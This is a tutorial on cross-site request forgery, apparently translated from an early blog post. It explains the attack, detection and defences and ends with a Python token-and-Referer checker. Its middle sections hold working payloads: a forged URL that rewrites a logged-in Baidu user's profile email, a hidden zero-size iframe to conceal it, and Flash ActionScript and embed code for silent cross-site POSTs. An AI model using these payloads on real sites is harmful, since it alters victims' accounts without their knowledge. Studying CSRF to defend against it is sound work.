0x01 What is a CSRF attack

CSRF is the abbreviation of Cross Site Request Forgery (also written XSRF). "Forgery" here means performing GET/POST operations against a CGI inside a user's session; you can think of it as hijacking the HTTP session.

A website uses cookies to identify users. After a user authenticates successfully, the browser holds a cookie, and as long as the user neither closes the browser nor logs out, that cookie is sent along with every later visit to the site. If the browser can be made to request a URL on the site during this period, the site will carry out operations the user never wanted (such as modifying personal data): the request is not one the user really intended to send. Because the request can also be submitted from a third-party website, the name carries the prefix "cross-site".

For example, on a BBS one can put the logout link into a post as the URL of an image. Everyone who views the post is logged out afterwards, because their browser has accessed the logout link with their identity. From the user's point of view there was only a post with a broken "image", and no wish to log out; but the program thinks the user asked to log out and destroys the session. This is the legendary CSRF attack.

Don't underestimate CSRF. I remember L-Blog had a CSRF vulnerability (I did not know the concept yet at the time :p): adding an administrator was just a link like http://localhost/L-Blog/admincp.asp?action=member&type=editmem&memID=2&memType=SupAdmin, and all it took was for the administrator to access this URL. Google's CSRF vulnerability [1] could leak email. Also, don't think that only XSS can produce worms; as long as the conditions are right, CSRF can too.
0x02 Where do the threats come from?

An embedded image can only issue a GET request; in many cases we need to forge a POST request. One way is through XSS on the target site itself. Of course the target site may not have XSS, in which case we can launch the attack from a third-party website. For example, if I want to attack a vulnerable blog, I leave a comment on the target blog containing a website address to lure the owner into clicking it (this depends on your skill at fooling people :p), and on that page an HTML form is constructed that submits the data.

Multi-window browsers make this easier. The convenience of multi-window browsers (Firefox, Maxthon, MyIE ...) also brings problems, because a new window in such a browser shares all current sessions. That is: if I log in to my blog with IE and then want to read the news, I run another IE process; the sessions in the two IE windows are independent of each other, so when the news page requests the blog, my login cookie is not sent. In a multi-window browser there is always only one process and the sessions in every window are shared, so when a request is sent to the blog from the news window, the cookie with which I logged in to the blog is carried along.

Think about it: when we click a link someone else left in a Blog/BBS/WebMail, perhaps a well-prepared CSRF attack is waiting for us.
0x03 Launching a CSRF attack

To launch a CSRF attack with POST from a third-party site, the form is submitted automatically to the target CGI using JavaScript. Writing a form by hand every time is inconvenient; helper tools include the xss post Forwarder [2] and CSRF Redirector [3], and I also wrote a corresponding ASP version [4]. To use it you only need to pass the URL to submit to and the parameters, and it will automatically POST them to the target. For example, to submit some data to www.0x54.org/a.asp:

http://www.0x54.org/lake2/xss_post_forwarder.asp?lake2=http://www.0x54.org/a.asp&a=123&b=321&c=%26%23%25

(URL encoding has to be taken into account here.)

But in an actual attack, you still have to think about how to trick users into visiting our web page.
0x04 An example

Because CSRF is not as eye-catching as XSS, finding a web application with CSRF is still quite easy. This time our target is Baidu, just for testing.

By whatever means, get a user who is logged in to Baidu to access this URL:

http://www.0x54.org/lake2/xss_post_forwarder.asp?lake2=http://passport.baidu.com/ucommitbas&u_jump_url=&sex=1&email=CSRF@baidu.com&sdv=&zodiac=0&birth_year=0&birth_month=0&birth_day=0&blood=0&bs0=%C7%EB%D1%A1%D4%F1&bs1=%C7%EB%D1%A1%D4%F1&bs2=%CE%DE&txt_bs=&birth_site=%3B%3B&b%3Drs0=%C7%EB%D1%A1%D4%F1&rs1=%C7%EB%D1%A1%D4%F1&rs2=%CE%DE&txt_rs=&reside_site=%3B%3B

Then check whether that person's personal information has been modified. One thing is a bit depressing: after the person visits the URL, the browser lands on the "data modified successfully" page, and we will be discovered. Is there a way to keep the browser from navigating there?

Yes. One way is to use an iframe and construct HTML like this:

<iframe width=0 height=0 src="http://www.0x54.org/lake2/xss_post_forwarder.asp?lake2=http://passport.baidu.com/ucommitbas&u_jump_url=&sex=1&email=CSRF@baidu.com&sdv=&zodiac=0&birth_year=0&birth_month=0&birth_day=0&blood=0&bs0=%C7%EB%D1%A1%D4%F1&bs1=%C7%EB%D1%A1%D4%F1&bs2=%CE%DE&txt_bs=&birth_site=%3B%3B&b%3Drs0=%C7%EB%D1%A1%D4%F1&rs1=%C7%EB%D1%A1%D4%F1&rs2=%CE%DE&txt_rs=&reside_site=%3B%3B"></iframe>

Another way is to use Flash.
0x05 CSRF with Flash

Flash can submit data to any URL. Open a pirated Adobe Flash CS3 Professional, create a new Flash file (ActionScript 3.0), right-click the default layer, choose Actions, and add the following code:

import flash.net.URLRequest;
import flash.net.URLRequestMethod;
import flash.net.URLVariables;
import flash.net.sendToURL;
import flash.system.Security;

// Target of the request
var url:URLRequest = new URLRequest("http://www.0x54.org/lake2");
// POST body; URLVariables parses a "name=value" query string
var lake:URLVariables = new URLVariables("a=lake2");
url.method = URLRequestMethod.POST;
url.data = lake;
// sendToURL sends the request and discards the response
sendToURL(url);
stop();

Export it as a swf file, open it, and capture the packets to see the effect: http://www.0x54.org/lake2/flash/test1.html
Writing AS and compiling a swf every time is very troublesome. Following the idea of CSRF Redirector, I wrote a similar Flash program [5]; then try Baidu again by visiting a web page with the following HTML:

<embed src="http://www.0x54.org/lake2/flash/flash_hacking.swf?f=1&t=http://passport.baidu.com/ucommitbas&d=u_jump_url%3D%26sex%3D1%26email%3DCSRF@baidu.com%26sdv%3D%26zodiac%3D0%26birth_year%3D0%26birth_month%3D0%26birth_day%3D0%26blood%3D0%26bs0%3D%25C7%25EB%25D1%25A1%25D4%25F1%26bs1%3D%25C7%25EB%25D1%25A1%25D4%25F1%26bs2%3D%25CE%25DE%26txt_bs%3D%26birth_site%3D%253B%253B%26b%253Drs0%3D%25C7%25EB%25D1%25A1%25D4%25F1%26rs1%3D%25C7%25EB%25D1%25A1%25D4%25F1%26rs2%3D%25CE%25DE%26txt_rs%3D%26reside_site%3D%253B%253B"></embed>

(Note that the parameters are URL-encoded a second time.)

Flash can do more than send requests: it can also read the returned content. If the response contains sensitive information, it can be read and sent to a web server we control. Of course, this depends on whether the target site allows Flash cross-domain access.
0x06 Detecting CSRF

Detecting a CSRF vulnerability is mostly manual labour: capture a normal request packet, remove the Referer field, and resubmit it. If the request is still processed, the problem basically exists. Of course, the parameters may contain something unpredictable (a userid or the like); then it depends on whether that unpredictable parameter can be obtained by other means, such as Flash. If it can, the problem still exists. Also try changing POST to GET, because some programs do not distinguish GET from POST.

Applications differ in their functions and responses, so automatically testing for CSRF remains difficult. OWASP has a tool named CSRFTester that you can try [6].
0x07 Defending against CSRF

On the web-application side, CSRF is generally defended against with the Referer, a token, or a verification code (CAPTCHA). Nexus's article [7] covers this thoroughly, and superhei has proposed bypass ideas [8]; please refer to their articles.

Another idea is to defend on the client side, which seems to amount to much the same thing.
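As an added illustration of sections 0x06 and 0x07 (this is example code written for this edit, not the author's or any project's code), the check below applies the server-side defences the article names: it refuses state changes over GET, rejects a request whose Referer/Origin has been stripped or points off-site, and compares a per-session token in constant time. The host name, the request/session dict shapes and the sample requests are constructed for the example.

```python
import hmac
import secrets
from urllib.parse import urlsplit

SITE_HOST = "blog.example.test"  # placeholder for the protected site's host


def issue_token(session):
    """Put a fresh random token in the server-side session; the page embeds
    it as a hidden form field so a third-party form cannot know it."""
    token = secrets.token_hex(16)
    session["csrf_token"] = token
    return token


def check_csrf(request, session):
    """Return (allowed, reason) for a state-changing request.
    request = {"method": str, "headers": dict, "form": dict} (constructed shape)."""
    # 1. State changes must be POST: a GET reachable from an <img> tag is
    #    exactly the 'image that logs you out' case from 0x01.
    if request["method"].upper() != "POST":
        return False, "state change via non-POST method"
    headers = {k.lower(): v for k, v in request["headers"].items()}
    # 2. Source check: the 0x06 test strips Referer and resubmits, so a
    #    missing header is rejected rather than silently accepted.
    source = headers.get("origin") or headers.get("referer")
    if not source:
        return False, "missing Origin/Referer"
    if urlsplit(source).hostname != SITE_HOST:
        return False, "cross-site source: %s" % urlsplit(source).hostname
    # 3. Per-session token (the 'unpredictable parameter'), constant-time compare.
    expected = session.get("csrf_token", "")
    supplied = request["form"].get("csrf_token", "")
    if not expected or not hmac.compare_digest(expected.encode(), supplied.encode()):
        return False, "bad or missing csrf token"
    return True, "ok"


def demo():
    """Constructed samples: a legitimate form post, the same post with the
    Referer stripped (the manual test from 0x06), and a third-party auto-submit."""
    session = {}
    token = issue_token(session)
    legit = {"method": "POST",
             "headers": {"Referer": "http://%s/profile" % SITE_HOST},
             "form": {"sex": "1", "csrf_token": token}}
    stripped = {**legit, "headers": {}}
    third_party = {"method": "POST",
                   "headers": {"Referer": "http://attacker.example.test/x.html"},
                   "form": {"sex": "1"}}
    return [check_csrf(r, session)[0] for r in (legit, stripped, third_party)]
```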